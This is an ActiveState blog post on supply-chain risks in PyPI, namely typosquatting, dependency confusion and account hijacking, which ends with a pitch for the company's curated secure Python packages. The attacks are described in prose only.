Last Updated: March 10, 2022

Secure PyPI? The Problem with Trusting Open Source Repositories

If you work with open source Python packages, your business relies on the integrity of the Python ecosystem in general, and the Python Package Index (PyPI) where the vast majority of Python packages are hosted, specifically. But is that trust warranted?

To be clear, we love Python and depend on PyPI as a critical resource for our business, just like so many other enterprises. The people that develop and maintain it as a public resource for all of us do good work, but PyPI is not the App Store. Perhaps the time has come for making the case that it should be. 

ActiveState recently published our Supply Chain Security survey which included results compiled from over 1500 coders, security personnel, and open source leaders at organizations both big and small, worldwide. The results indicate that far too many organizations (no matter their size) continue to implicitly trust open source language repositories like PyPI.

Implicit Trust in Public Repos

This is despite the fact that:

  • PyPI contains hundreds of thousands of packages created by tens of thousands of authors and maintainers, all of whom must be trusted. Given that anyone can upload a package to PyPI, this seems like a foolhardy assumption at best, if not downright dangerous. 
  • PyPI has no gatekeepers, and only a limited set of safeguards (i.e., you can’t upload a package with a name that’s already taken). There’s simply nothing stopping a developer from uploading malware since PyPI code isn’t audited, independently reviewed, or even scanned in depth.

The message is clear – user beware, which pushes the overhead of checking the security and integrity of every package to every organization that uses them – a massive waste of computing resources when taken globally. While plans have existed for years to create better security for PyPI, the actual implementation still lags the need. This post explores some of the alternatives organizations may want to consider in the meantime.

Rising PyPI Threats to the Software Supply Chain

Software supply chain attacks have been on the rise for many years, but have increased exponentially since the start of the pandemic. The majority of supply chain attacks take advantage of the lax security of open source repositories to upload a number of different exploits, including: 

  • Pytosquatting, which is typosquatting for the Python ecosystem. On the web, typosquatting occurs when bad actors register near-miss domain names in the hope you won’t spot the spelling difference (e.g. amazan.com), or else hope you’ll mistype the site name (ie., amazin.com). In PyPI, pytosquatters register near-miss names of popular packages or otherwise create believable package names that they hope you’ll download and install by mistake.
  • Dependency confusion has recently become even more popular than typosquatting. It occurs because PyPI provides no support for namespacing. As a result, bad actors can guess the name of a package your organization may have created internally (i.e., amazon_requests), and then upload a newer version of it to PyPI from where your tooling may inadvertently pull it. Some of the biggest enterprises on the planet have been affected by this exploit, including Apple, Microsoft and Tesla
  • Identity Hijacking – occurs when a bad actor guesses/cracks an author’s password, or else offers to take over an abandoned or neglected project that the original owner no longer has time to look after.

Unfortunately, such attacks occur all too often. While the folks that run PyPI are quick to remove exploits when made aware of them, a compromised package that’s available even for just a few days can negatively impact hundreds of thousands of users. For example, one researcher registered more than 1,000 package names by eliminating separators like _ or – in the names of the top 10,000 packages on PyPI. The result:

“In a little over two years there have been 530,950 total pip install commands run on 1,131 packages.”

More troubling, in July 2020, the request package (note the typo: request and not requests) was downloaded over 10,000 times. It contained malware that installed a daemon in .bashrc, providing the attacker with a remote shell on the machine.

Progress Toward A Secure PyPI

PyPI is run by some very smart, dedicated folks that take security seriously, but are limited by funding constraints. Still, they have pushed forward a number of projects recently, including:

  • The addition of two-factor authentication for PyPI login.
  • The ability to require an API token when uploading packages to PyPI.
  • A forthcoming project that will introduce “organization accounts” whereby authors can create an organization, invite other users to join, organize those users into teams, as well as manage ownership and permissions across multiple projects.
    • It’s also proposed that this project would provide namespace support in order to counter exploits like dependency confusion.

Unfortunately, these kinds of projects can take years to implement. In the meantime, there are a number of measures you can take to decrease the risk of importing code from open source repositories. For example, our Supply Chain Security survey indicated that respondents currently implement a number of “best practice” import checks, where possible:

Best Practice Import Controls 

Depending on your appetite for risk and the time/resources you have available, you may also want to implement:

  • A routine that can flag suspect typosquatted packages 
  • A static code analysis tool
  • A quarantine area to park suspect packages for further investigation

Conclusions: Developers need secure Python packages that can be trusted, from end to end

While implementing best practices to reduce the risk associated with imported open source code is always a good idea, dealing with malicious packages as they come up can seem like an endless game of whack-a-mole. But going back to a time before open source packages made coding so much easier and quicker seems impossible given the complexity of modern applications.

As an alternative, 33% of our Supply Chain Survey respondents indicated that they prefer to work with a trusted vendor. Unfortunately, a vendor’s packages require time to curate, license verify, code scan, build and make available for distribution. This is one of the reasons that organizations prefer to work with older versions of Python. But older versions may contain a number of vulnerabilities, creating a security tradeoff.

To help resolve this tradeoff, ActiveState has begun publishing a set of secure Python packages using our ActiveState Platform, which can build and make packages available in a matter of minutes for the latest versions of Python. Each package has been:

In this way, we’ve begun the process of creating a secure version of PyPI that anyone can use to download some of the most popular Python packages and install them with pip, including:

Plus many more are in the works. Give it a try and let us know what you think, in our Community Forums.

Next steps:

If you’d like to obtain your own Hosted Artifact Repository that contains just the Python packages your organization requires, Talk to our product experts >

Dana Crane

Dana Crane

Experienced Product Marketer and Product Manager with a demonstrated history of success in the computer software industry. Strong skills in Product Lifecycle Management, Pragmatic Marketing methods, Enterprise Software, Software as a Service (SaaS), Agile Methodologies, Customer Relationship Management (CRM), and Go-to-market Strategy.